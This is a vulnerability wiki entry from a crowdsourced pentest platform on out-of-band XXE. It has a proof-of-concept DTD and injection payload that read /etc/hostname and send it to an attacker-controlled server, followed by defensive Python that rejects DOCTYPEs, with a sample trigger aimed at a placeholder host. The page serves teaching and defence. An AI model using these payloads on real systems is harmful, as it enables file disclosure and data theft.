Cobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

OOB (Out of Band) XXE

POC

Create a payload.dtd file with the following content and host it on your server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http:///?x=%file;'>">
%eval;

In the vulnerable website, add the following to the input area:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http:///payload.dtd"> %xxe;]>

Then check the web server access logs. The XML parser first fetches the external DTD file, and the entities it declares then leak the hostname to the attacker-controlled server in a second request.
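The fix on the parsing side is to refuse the DOCTYPE that every XXE payload depends on, so neither the inline %xxe; parameter entity nor the external payload.dtd is ever fetched. The following is an added example (not Cobalt's code) using Python's stdlib expat bindings; the samples, the attacker.example host and the function names are constructed for illustration.

```python
import xml.parsers.expat as expat


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (required by any XXE payload)."""


def parse_untrusted_xml(data: bytes) -> list[str]:
    """Parse XML from an untrusted source and return the element names seen.

    A DOCTYPE is rejected as soon as it is read, before any entity can be
    declared; external entity references are refused as a second line of defence.
    """
    parser = expat.ParserCreate()
    seen: list[str] = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Fires on '<!DOCTYPE' itself, before the internal subset is parsed.
        raise UnsafeXMLError(f"DOCTYPE not allowed in untrusted XML (root={name!r})")

    def on_external_entity(context, base, system_id, public_id):
        # Returning 0 tells expat the entity cannot be resolved: no file read, no HTTP request.
        return 0

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)
    return seen


def check_untrusted_xml(data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) so callers can log rejected documents instead of crashing."""
    try:
        elements = parse_untrusted_xml(data)
    except UnsafeXMLError as exc:
        return False, str(exc)
    except expat.ExpatError as exc:
        return False, f"malformed XML: {exc}"
    return True, f"ok, {len(elements)} element(s)"


# Constructed samples: the page's OOB XXE trigger with a placeholder host, and a benign document.
OOB_XXE_SAMPLE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.example/payload.dtd"> %xxe;]>'
    b"<foo>bar</foo>"
)
BENIGN_SAMPLE = b'<?xml version="1.0"?><order><item sku="A1"/></order>'

if __name__ == "__main__":
    for sample in (OOB_XXE_SAMPLE, BENIGN_SAMPLE):
        print(check_untrusted_xml(sample))
```

Logging the rejection reason gives the SOC a cheap detection signal: a DOCTYPE arriving in an endpoint that never legitimately needs one is worth an alert.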

Impact

High

Likelihood

High